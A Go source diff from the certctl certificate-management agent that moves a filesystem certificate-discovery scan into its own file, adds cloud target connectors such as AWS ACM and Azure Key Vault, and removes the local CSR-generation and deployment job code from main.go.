return nil, fmt.Errorf("invalid JavaKeystore config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return jks.New(&cfg, a.logger), nil
|
||||||
|
|
||||||
|
case "KubernetesSecrets":
|
||||||
|
var cfg k8s.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid KubernetesSecrets config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return k8s.New(&cfg, a.logger)
|
||||||
|
|
||||||
|
case "AWSACM":
|
||||||
|
// Rank 5 of the 2026-05-03 Infisical deep-research deliverable.
|
||||||
|
// AWS Certificate Manager target — SDK-driven (no file I/O).
|
||||||
|
// LoadDefaultConfig handles the standard AWS credential chain
|
||||||
|
// (IRSA / EC2 instance profile / SSO / env vars) without any
|
||||||
|
// long-lived creds in connector Config.
|
||||||
|
var cfg awsacm.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid AWSACM config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return awsacm.New(ctx, &cfg, a.logger)
|
||||||
|
|
||||||
|
case "AzureKeyVault":
|
||||||
|
// Rank 5 of the 2026-05-03 Infisical deep-research deliverable.
|
||||||
|
// Azure Key Vault target — SDK-driven (no file I/O).
|
||||||
|
// DefaultAzureCredential handles the standard Azure credential
|
||||||
|
// chain (managed identity / workload identity / env vars / az
|
||||||
|
// CLI fallback). Long-lived service-principal secrets are
|
||||||
|
// supported but discouraged via the credential_mode config.
|
||||||
|
var cfg azurekv.Config
|
||||||
|
if len(configJSON) > 0 {
|
||||||
|
if err := json.Unmarshal(configJSON, &cfg); err != nil {
|
||||||
|
return nil, fmt.Errorf("invalid AzureKeyVault config: %w", err)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return azurekv.New(ctx, &cfg, a.logger)
|
||||||
|
|
||||||
|
default:
|
||||||
|
return nil, fmt.Errorf("unsupported target type: %s", targetType)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// splitPEMChain separates a concatenated PEM bundle into its first block and everything
// that follows it.
//
// The first return value is the first decodable PEM block, re-encoded; the second is the
// remaining input with surrounding whitespace trimmed ("" when nothing follows). When the
// input contains no decodable PEM block at all, the input is returned unchanged as the
// first value and the second value is empty.
func splitPEMChain(pemChain string) (string, string) {
	first, remainder := pem.Decode([]byte(pemChain))
	if first == nil {
		// Nothing decodable: hand the input back untouched.
		return pemChain, ""
	}

	leaf := pem.EncodeToMemory(first)

	// Trimming covers the blank lines between blocks and yields "" for a lone block.
	return string(leaf), strings.TrimSpace(string(remainder))
}
|
||||||
|
|
||||||
|
// fetchCertificate retrieves the certificate PEM chain from the control plane.
|
||||||
|
// GET /api/v1/agents/{agentID}/certificates/{certID}
|
||||||
|
func (a *Agent) fetchCertificate(ctx context.Context, certID string) (string, error) {
|
||||||
|
path := fmt.Sprintf("/api/v1/agents/%s/certificates/%s", a.config.AgentID, certID)
|
||||||
|
resp, err := a.makeRequest(ctx, http.MethodGet, path, nil)
|
||||||
|
if err != nil {
|
||||||
|
return "", fmt.Errorf("request failed: %w", err)
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusOK {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
return "", fmt.Errorf("server returned %d: %s", resp.StatusCode, string(body))
|
||||||
|
}
|
||||||
|
|
||||||
|
var certResp struct {
|
||||||
|
CertificatePEM string `json:"certificate_pem"`
|
||||||
|
}
|
||||||
|
if err := json.NewDecoder(resp.Body).Decode(&certResp); err != nil {
|
||||||
|
return "", fmt.Errorf("failed to decode response: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
return certResp.CertificatePEM, nil
|
||||||
|
}
|
||||||
@@ -0,0 +1,275 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package main
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"crypto/ecdsa"
|
||||||
|
"crypto/rsa"
|
||||||
|
"crypto/sha256"
|
||||||
|
"crypto/x509"
|
||||||
|
"encoding/pem"
|
||||||
|
"fmt"
|
||||||
|
"io"
|
||||||
|
"net/http"
|
||||||
|
"os"
|
||||||
|
"path/filepath"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 12 (2026-05-14): extracted from
|
||||||
|
// cmd/agent/main.go via the Option B sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds the filesystem DISCOVERY scan — the agent's
|
||||||
|
// outbound surface for reporting pre-existing certificates it
|
||||||
|
// finds on disk back to the control plane (POST /api/v1/agents/
|
||||||
|
// {id}/discoveries, a machine-to-machine flow NOT exposed via the
|
||||||
|
// MCP surface per the comment in
|
||||||
|
// internal/mcp/tools.go::RegisterTools):
|
||||||
|
//
|
||||||
|
// - runDiscoveryScan: walks each configured discovery directory,
|
||||||
|
// dispatches each candidate file to parsePEMFile or parseDERFile
|
||||||
|
// depending on extension, batches the parsed entries, and POSTs
|
||||||
|
// them in one report.
|
||||||
|
// - parsePEMFile / parseDERFile: extract every X.509 certificate
|
||||||
|
// from a candidate file in either encoding.
|
||||||
|
// - certToEntry: project a parsed *x509.Certificate into the
|
||||||
|
// discoveredCertEntry shape the control plane expects.
|
||||||
|
// - discoveredCertEntry struct + sha256Sum + certKeyInfo helpers
|
||||||
|
// consumed only by the discovery path; co-locating them keeps
|
||||||
|
// this file self-contained.
|
||||||
|
|
||||||
|
// runDiscoveryScan walks configured directories, parses certificate files, and reports
|
||||||
|
// discovered certificates to the control plane.
|
||||||
|
// Supports PEM and DER encoded X.509 certificates.
|
||||||
|
func (a *Agent) runDiscoveryScan(ctx context.Context) {
|
||||||
|
a.logger.Info("starting filesystem certificate discovery scan",
|
||||||
|
"directories", a.config.DiscoveryDirs)
|
||||||
|
|
||||||
|
startTime := time.Now()
|
||||||
|
var certs []discoveredCertEntry
|
||||||
|
var scanErrors []string
|
||||||
|
|
||||||
|
for _, dir := range a.config.DiscoveryDirs {
|
||||||
|
a.logger.Debug("scanning directory", "path", dir)
|
||||||
|
|
||||||
|
err := filepath.Walk(dir, func(path string, info os.FileInfo, err error) error {
|
||||||
|
if err != nil {
|
||||||
|
scanErrors = append(scanErrors, fmt.Sprintf("walk error at %s: %v", path, err))
|
||||||
|
return nil // continue walking
|
||||||
|
}
|
||||||
|
if info.IsDir() {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Skip files larger than 1MB (unlikely to be a certificate)
|
||||||
|
if info.Size() > 1*1024*1024 {
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check file extension
|
||||||
|
ext := strings.ToLower(filepath.Ext(path))
|
||||||
|
switch ext {
|
||||||
|
case ".pem", ".crt", ".cer", ".cert":
|
||||||
|
found := a.parsePEMFile(path)
|
||||||
|
certs = append(certs, found...)
|
||||||
|
case ".der":
|
||||||
|
if entry, err := a.parseDERFile(path); err == nil {
|
||||||
|
certs = append(certs, entry)
|
||||||
|
} else {
|
||||||
|
a.logger.Debug("skipping non-cert DER file", "path", path, "error", err)
|
||||||
|
}
|
||||||
|
default:
|
||||||
|
// Try PEM parsing for extensionless files or unknown extensions
|
||||||
|
if ext == "" || ext == ".key" {
|
||||||
|
return nil // skip key files and extensionless
|
||||||
|
}
|
||||||
|
found := a.parsePEMFile(path)
|
||||||
|
if len(found) > 0 {
|
||||||
|
certs = append(certs, found...)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return nil
|
||||||
|
})
|
||||||
|
if err != nil {
|
||||||
|
scanErrors = append(scanErrors, fmt.Sprintf("failed to walk %s: %v", dir, err))
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
scanDuration := time.Since(startTime)
|
||||||
|
a.logger.Info("discovery scan completed",
|
||||||
|
"certificates_found", len(certs),
|
||||||
|
"errors", len(scanErrors),
|
||||||
|
"duration_ms", scanDuration.Milliseconds())
|
||||||
|
|
||||||
|
if len(certs) == 0 && len(scanErrors) == 0 {
|
||||||
|
a.logger.Debug("no certificates found and no errors, skipping report")
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
// Build report payload
|
||||||
|
entries := make([]map[string]interface{}, len(certs))
|
||||||
|
for i, c := range certs {
|
||||||
|
entries[i] = map[string]interface{}{
|
||||||
|
"fingerprint_sha256": c.FingerprintSHA256,
|
||||||
|
"common_name": c.CommonName,
|
||||||
|
"sans": c.SANs,
|
||||||
|
"serial_number": c.SerialNumber,
|
||||||
|
"issuer_dn": c.IssuerDN,
|
||||||
|
"subject_dn": c.SubjectDN,
|
||||||
|
"not_before": c.NotBefore,
|
||||||
|
"not_after": c.NotAfter,
|
||||||
|
"key_algorithm": c.KeyAlgorithm,
|
||||||
|
"key_size": c.KeySize,
|
||||||
|
"is_ca": c.IsCA,
|
||||||
|
"pem_data": c.PEMData,
|
||||||
|
"source_path": c.SourcePath,
|
||||||
|
"source_format": c.SourceFormat,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
report := map[string]interface{}{
|
||||||
|
"agent_id": a.config.AgentID,
|
||||||
|
"directories": a.config.DiscoveryDirs,
|
||||||
|
"certificates": entries,
|
||||||
|
"errors": scanErrors,
|
||||||
|
"scan_duration_ms": int(scanDuration.Milliseconds()),
|
||||||
|
}
|
||||||
|
|
||||||
|
// Submit to control plane
|
||||||
|
path := fmt.Sprintf("/api/v1/agents/%s/discoveries", a.config.AgentID)
|
||||||
|
resp, err := a.makeRequest(ctx, http.MethodPost, path, report)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Error("failed to submit discovery report", "error", err)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
defer resp.Body.Close()
|
||||||
|
|
||||||
|
if resp.StatusCode != http.StatusAccepted {
|
||||||
|
body, _ := io.ReadAll(resp.Body)
|
||||||
|
a.logger.Error("discovery report rejected",
|
||||||
|
"status", resp.StatusCode,
|
||||||
|
"body", string(body))
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
a.logger.Info("discovery report submitted successfully",
|
||||||
|
"certificates", len(certs),
|
||||||
|
"errors", len(scanErrors))
|
||||||
|
}
|
||||||
|
|
||||||
|
// discoveredCertEntry holds parsed certificate metadata for reporting.
// Values are produced by certToEntry; every field is a plain string, number or
// bool so the entry can be copied straight into the discovery report payload.
type discoveredCertEntry struct {
	FingerprintSHA256 string   `json:"fingerprint_sha256"` // hex-encoded SHA-256 of the certificate's raw DER bytes
	CommonName        string   `json:"common_name"`        // subject common name
	SANs              []string `json:"sans"`               // DNS names only, as populated by certToEntry
	SerialNumber      string   `json:"serial_number"`      // serial number rendered in base 16
	IssuerDN          string   `json:"issuer_dn"`          // issuer distinguished name, string form
	SubjectDN         string   `json:"subject_dn"`         // subject distinguished name, string form
	NotBefore         string   `json:"not_before"`         // start of validity, UTC, RFC 3339
	NotAfter          string   `json:"not_after"`          // end of validity, UTC, RFC 3339
	KeyAlgorithm      string   `json:"key_algorithm"`      // algorithm name reported by certKeyInfo
	KeySize           int      `json:"key_size"`           // key size in bits reported by certKeyInfo (0 when not determined)
	IsCA              bool     `json:"is_ca"`              // copied from the certificate's IsCA flag
	PEMData           string   `json:"pem_data"`           // the certificate encoded as a PEM block
	SourcePath        string   `json:"source_path"`        // path of the file the certificate was read from
	SourceFormat      string   `json:"source_format"`      // encoding of the source file: "PEM" or "DER"
}
|
||||||
|
|
||||||
|
// parsePEMFile reads a file and extracts all X.509 certificates from PEM blocks.
|
||||||
|
func (a *Agent) parsePEMFile(path string) []discoveredCertEntry {
|
||||||
|
data, err := os.ReadFile(path)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Debug("failed to read file", "path", path, "error", err)
|
||||||
|
return nil
|
||||||
|
}
|
||||||
|
|
||||||
|
var entries []discoveredCertEntry
|
||||||
|
rest := data
|
||||||
|
for {
|
||||||
|
var block *pem.Block
|
||||||
|
block, rest = pem.Decode(rest)
|
||||||
|
if block == nil {
|
||||||
|
break
|
||||||
|
}
|
||||||
|
if block.Type != "CERTIFICATE" {
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
cert, err := x509.ParseCertificate(block.Bytes)
|
||||||
|
if err != nil {
|
||||||
|
a.logger.Debug("failed to parse certificate in PEM", "path", path, "error", err)
|
||||||
|
continue
|
||||||
|
}
|
||||||
|
|
||||||
|
pemStr := string(pem.EncodeToMemory(block))
|
||||||
|
entries = append(entries, certToEntry(cert, path, "PEM", pemStr))
|
||||||
|
}
|
||||||
|
return entries
|
||||||
|
}
|
||||||
|
|
||||||
|
// parseDERFile reads a DER-encoded certificate file.
|
||||||
|
func (a *Agent) parseDERFile(path string) (discoveredCertEntry, error) {
|
||||||
|
data, err := os.ReadFile(path)
|
||||||
|
if err != nil {
|
||||||
|
return discoveredCertEntry{}, fmt.Errorf("read failed: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
cert, err := x509.ParseCertificate(data)
|
||||||
|
if err != nil {
|
||||||
|
return discoveredCertEntry{}, fmt.Errorf("parse failed: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Convert to PEM for storage
|
||||||
|
pemStr := string(pem.EncodeToMemory(&pem.Block{Type: "CERTIFICATE", Bytes: data}))
|
||||||
|
return certToEntry(cert, path, "DER", pemStr), nil
|
||||||
|
}
|
||||||
|
|
||||||
|
// certToEntry converts a parsed x509.Certificate into a discoveredCertEntry.
|
||||||
|
func certToEntry(cert *x509.Certificate, path, format, pemData string) discoveredCertEntry {
|
||||||
|
// Compute SHA-256 fingerprint
|
||||||
|
fingerprint := fmt.Sprintf("%x", sha256Sum(cert.Raw))
|
||||||
|
|
||||||
|
// Determine key algorithm and size
|
||||||
|
keyAlg, keySize := certKeyInfo(cert)
|
||||||
|
|
||||||
|
return discoveredCertEntry{
|
||||||
|
FingerprintSHA256: fingerprint,
|
||||||
|
CommonName: cert.Subject.CommonName,
|
||||||
|
SANs: cert.DNSNames,
|
||||||
|
SerialNumber: cert.SerialNumber.Text(16),
|
||||||
|
IssuerDN: cert.Issuer.String(),
|
||||||
|
SubjectDN: cert.Subject.String(),
|
||||||
|
NotBefore: cert.NotBefore.UTC().Format(time.RFC3339),
|
||||||
|
NotAfter: cert.NotAfter.UTC().Format(time.RFC3339),
|
||||||
|
KeyAlgorithm: keyAlg,
|
||||||
|
KeySize: keySize,
|
||||||
|
IsCA: cert.IsCA,
|
||||||
|
PEMData: pemData,
|
||||||
|
SourcePath: path,
|
||||||
|
SourceFormat: format,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// sha256Sum computes the SHA-256 digest of data and returns it as a
// fixed-size 32-byte array.
func sha256Sum(data []byte) [32]byte {
	digest := sha256.Sum256(data)
	return digest
}
|
||||||
|
|
||||||
|
// certKeyInfo reports the public-key algorithm name and key size in bits for
// cert.
//
// ECDSA keys report the curve's bit size and RSA keys the modulus bit length.
// For any other key type the certificate's declared algorithm decides:
// Ed25519 is reported as 256 bits, and everything else as the algorithm's
// string form with size 0.
func certKeyInfo(cert *x509.Certificate) (string, int) {
	if ec, ok := cert.PublicKey.(*ecdsa.PublicKey); ok {
		return "ECDSA", ec.Curve.Params().BitSize
	}
	if rsaKey, ok := cert.PublicKey.(*rsa.PublicKey); ok {
		return "RSA", rsaKey.N.BitLen()
	}

	// Not a key type inspected directly; fall back to the declared algorithm.
	if cert.PublicKeyAlgorithm == x509.Ed25519 {
		return "Ed25519", 256
	}
	return cert.PublicKeyAlgorithm.String(), 0
}
|
||||||
@@ -6,16 +6,9 @@ package main
|
|||||||
import (
|
import (
|
||||||
"bytes"
|
"bytes"
|
||||||
"context"
|
"context"
|
||||||
"crypto/ecdsa"
|
|
||||||
"crypto/elliptic"
|
|
||||||
"crypto/rand"
|
|
||||||
"crypto/rsa"
|
|
||||||
"crypto/sha256"
|
|
||||||
"crypto/tls"
|
"crypto/tls"
|
||||||
"crypto/x509"
|
"crypto/x509"
|
||||||
"crypto/x509/pkix"
|
|
||||||
"encoding/json"
|
"encoding/json"
|
||||||
"encoding/pem"
|
|
||||||
"errors"
|
"errors"
|
||||||
"flag"
|
"flag"
|
||||||
"fmt"
|
"fmt"
|
||||||
@@ -26,29 +19,11 @@ import (
|
|||||||
"net/url"
|
"net/url"
|
||||||
"os"
|
"os"
|
||||||
"os/signal"
|
"os/signal"
|
||||||
"path/filepath"
|
|
||||||
"runtime"
|
"runtime"
|
||||||
"strings"
|
"strings"
|
||||||
"sync"
|
"sync"
|
||||||
"syscall"
|
"syscall"
|
||||||
"time"
|
"time"
|
||||||
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/apache"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/awsacm"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/azurekv"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/caddy"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/envoy"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/f5"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/haproxy"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/iis"
|
|
||||||
jks "github.com/certctl-io/certctl/internal/connector/target/javakeystore"
|
|
||||||
k8s "github.com/certctl-io/certctl/internal/connector/target/k8ssecret"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/nginx"
|
|
||||||
pf "github.com/certctl-io/certctl/internal/connector/target/postfix"
|
|
||||||
sshconn "github.com/certctl-io/certctl/internal/connector/target/ssh"
|
|
||||||
"github.com/certctl-io/certctl/internal/connector/target/traefik"
|
|
||||||
wcs "github.com/certctl-io/certctl/internal/connector/target/wincertstore"
|
|
||||||
)
|
)
|
||||||
|
|
||||||
// AgentConfig represents the agent-side configuration.
|
// AgentConfig represents the agent-side configuration.
|
||||||
@@ -394,618 +369,6 @@ func (a *Agent) sendHeartbeat(ctx context.Context) {
|
|||||||
a.logger.Debug("heartbeat acknowledged")
|
a.logger.Debug("heartbeat acknowledged")
|
||||||
}
|
}
|
||||||
|
|
||||||
// pollForWork queries the control plane for actionable jobs and processes them.
|
|
||||||
// Jobs may be deployment jobs (Pending) or CSR jobs (AwaitingCSR).
|
|
||||||
// GET /api/v1/agents/{agentID}/work
|
|
||||||
func (a *Agent) pollForWork(ctx context.Context) {
|
|
||||||
a.logger.Debug("polling for work", "agent_id", a.config.AgentID)
|
|
||||||
|
|
||||||
path := fmt.Sprintf("/api/v1/agents/%s/work", a.config.AgentID)
|
|
||||||
resp, err := a.makeRequest(ctx, http.MethodGet, path, nil)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("work poll failed", "error", err)
|
|
||||||
a.consecutiveFailures++
|
|
||||||
return
|
|
||||||
}
|
|
||||||
defer resp.Body.Close()
|
|
||||||
|
|
||||||
// I-004: same terminal-retirement handling as sendHeartbeat. Work-poll is the
|
|
||||||
// other hot path that can observe an agent's soft-retirement; if the
|
|
||||||
// heartbeat tick happens to fire after a work-poll tick within the same
|
|
||||||
// retirement window, this branch catches it first. markRetired's sync.Once
|
|
||||||
// guards idempotency so racing both paths in the same tick only closes the
|
|
||||||
// signal channel once. No consecutiveFailures increment — retirement is
|
|
||||||
// not a transient failure.
|
|
||||||
if resp.StatusCode == http.StatusGone {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
a.markRetired("work_poll", resp.StatusCode, string(body))
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
if resp.StatusCode != http.StatusOK {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
a.logger.Error("work poll rejected",
|
|
||||||
"status", resp.StatusCode,
|
|
||||||
"body", string(body))
|
|
||||||
a.consecutiveFailures++
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
var workResp WorkResponse
|
|
||||||
if err := json.NewDecoder(resp.Body).Decode(&workResp); err != nil {
|
|
||||||
a.logger.Error("failed to decode work response", "error", err)
|
|
||||||
a.consecutiveFailures++
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.consecutiveFailures = 0
|
|
||||||
|
|
||||||
if workResp.Count == 0 {
|
|
||||||
a.logger.Debug("no pending work")
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("received work", "job_count", workResp.Count)
|
|
||||||
|
|
||||||
// Process each job based on type and status
|
|
||||||
for _, job := range workResp.Jobs {
|
|
||||||
switch {
|
|
||||||
case job.Status == "AwaitingCSR":
|
|
||||||
// Agent keygen mode: generate key locally, create CSR, submit to server
|
|
||||||
a.executeCSRJob(ctx, job)
|
|
||||||
case job.Type == "Deployment":
|
|
||||||
a.executeDeploymentJob(ctx, job)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// executeCSRJob handles an AwaitingCSR job: generates a private key locally, creates a CSR,
|
|
||||||
// and submits it to the control plane for signing. The private key is stored on the local
|
|
||||||
// filesystem with 0600 permissions and NEVER sent to the server.
|
|
||||||
//
|
|
||||||
// Flow:
|
|
||||||
// 1. Generate ECDSA P-256 key pair
|
|
||||||
// 2. Store private key to disk (keyDir/certID.key) with 0600 permissions
|
|
||||||
// 3. Create CSR with common name and SANs from work response
|
|
||||||
// 4. Submit CSR to control plane via POST /agents/{id}/csr
|
|
||||||
// 5. Server signs the CSR and creates a cert version + deployment jobs
|
|
||||||
func (a *Agent) executeCSRJob(ctx context.Context, job JobItem) {
|
|
||||||
a.logger.Info("executing CSR job (agent-side key generation)",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID,
|
|
||||||
"common_name", job.CommonName)
|
|
||||||
|
|
||||||
// Step 1: Generate ECDSA P-256 key pair
|
|
||||||
privKey, err := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to generate private key",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key generation failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("generated ECDSA P-256 key pair locally",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID)
|
|
||||||
|
|
||||||
// Step 2: Store private key to disk with secure permissions.
|
|
||||||
//
|
|
||||||
// Bundle-9 / Audit L-002 + L-003: marshal+write through helpers that
|
|
||||||
// (a) zeroize the in-heap DER buffer immediately after the PEM block is
|
|
||||||
// constructed so the private scalar's exposure window is bounded by
|
|
||||||
// this function call, and (b) assert the key directory is mode 0700
|
|
||||||
// before any write touches disk. Also defer-clear the PEM buffer for
|
|
||||||
// the same reason — the encoded key isn't sensitive in transit (it's
|
|
||||||
// going to disk) but lingers on the heap if we don't.
|
|
||||||
keyPath := filepath.Join(a.config.KeyDir, job.CertificateID+".key")
|
|
||||||
if err := ensureAgentKeyDirSecure(filepath.Dir(keyPath)); err != nil {
|
|
||||||
a.logger.Error("agent key dir hardening failed", "job_id", job.ID, "error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key dir hardening failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
var privKeyPEM []byte
|
|
||||||
if marshalErr := marshalAgentKeyAndZeroize(privKey, func(der []byte) error {
|
|
||||||
privKeyPEM = pem.EncodeToMemory(&pem.Block{
|
|
||||||
Type: "EC PRIVATE KEY",
|
|
||||||
Bytes: der,
|
|
||||||
})
|
|
||||||
return nil
|
|
||||||
}); marshalErr != nil {
|
|
||||||
a.logger.Error("failed to marshal private key",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", marshalErr)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key marshal failed: %v", marshalErr)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
defer clear(privKeyPEM)
|
|
||||||
|
|
||||||
if err := os.WriteFile(keyPath, privKeyPEM, 0600); err != nil {
|
|
||||||
a.logger.Error("failed to write private key to disk",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"key_path", keyPath,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("key storage failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("private key stored securely",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"key_path", keyPath,
|
|
||||||
"permissions", "0600")
|
|
||||||
|
|
||||||
// Validate common name is present
|
|
||||||
if job.CommonName == "" {
|
|
||||||
a.logger.Error("empty common name in CSR job", "job_id", job.ID)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", "empty common name"); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
// Step 3: Create CSR with common name and SANs
|
|
||||||
// Split SANs into DNS names and email addresses for proper CSR encoding
|
|
||||||
var dnsNames []string
|
|
||||||
var emailAddresses []string
|
|
||||||
for _, san := range job.SANs {
|
|
||||||
if strings.Contains(san, "@") {
|
|
||||||
emailAddresses = append(emailAddresses, san)
|
|
||||||
} else {
|
|
||||||
dnsNames = append(dnsNames, san)
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
csrTemplate := &x509.CertificateRequest{
|
|
||||||
Subject: pkix.Name{
|
|
||||||
CommonName: job.CommonName,
|
|
||||||
},
|
|
||||||
DNSNames: dnsNames,
|
|
||||||
EmailAddresses: emailAddresses,
|
|
||||||
}
|
|
||||||
|
|
||||||
csrDER, err := x509.CreateCertificateRequest(rand.Reader, csrTemplate, privKey)
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to create CSR",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR creation failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
csrPEM := string(pem.EncodeToMemory(&pem.Block{
|
|
||||||
Type: "CERTIFICATE REQUEST",
|
|
||||||
Bytes: csrDER,
|
|
||||||
}))
|
|
||||||
|
|
||||||
// Step 4: Submit CSR to the control plane (only the public key leaves the agent)
|
|
||||||
a.logger.Info("submitting CSR to control plane",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID)
|
|
||||||
|
|
||||||
submitPath := fmt.Sprintf("/api/v1/agents/%s/csr", a.config.AgentID)
|
|
||||||
resp, err := a.makeRequest(ctx, http.MethodPost, submitPath, map[string]string{
|
|
||||||
"csr_pem": csrPEM,
|
|
||||||
"certificate_id": job.CertificateID,
|
|
||||||
})
|
|
||||||
if err != nil {
|
|
||||||
a.logger.Error("failed to submit CSR",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"error", err)
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR submission failed: %v", err)); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
defer resp.Body.Close()
|
|
||||||
|
|
||||||
if resp.StatusCode != http.StatusAccepted {
|
|
||||||
body, _ := io.ReadAll(resp.Body)
|
|
||||||
a.logger.Error("CSR submission rejected",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"status", resp.StatusCode,
|
|
||||||
"body", string(body))
|
|
||||||
if reportErr := a.reportJobStatus(ctx, job.ID, "Failed", fmt.Sprintf("CSR rejected: %s", string(body))); reportErr != nil {
|
|
||||||
a.logger.Error("failed to report job status to server", "job_id", job.ID, "status", "Failed", "error", reportErr)
|
|
||||||
}
|
|
||||||
return
|
|
||||||
}
|
|
||||||
|
|
||||||
a.logger.Info("CSR submitted and signed successfully",
|
|
||||||
"job_id", job.ID,
|
|
||||||
"certificate_id", job.CertificateID,
|
|
||||||
"key_path", keyPath)
|
|
||||||
}
|
|
||||||
|
|
||||||
// executeDeploymentJob executes a deployment job by fetching the certificate and deploying it
// to the target system using the connector that createTargetConnector returns for the job's
// target type.
//
// The private key is always read from the local key store (keyDir/certID.key); it is never
// fetched from the server. A missing or unreadable key file fails the job.
//
// Flow:
//  1. Report job as Running (a failure to report is logged but does not stop the job)
//  2. Fetch the certificate PEM from the control plane
//  3. Load the local private key (required)
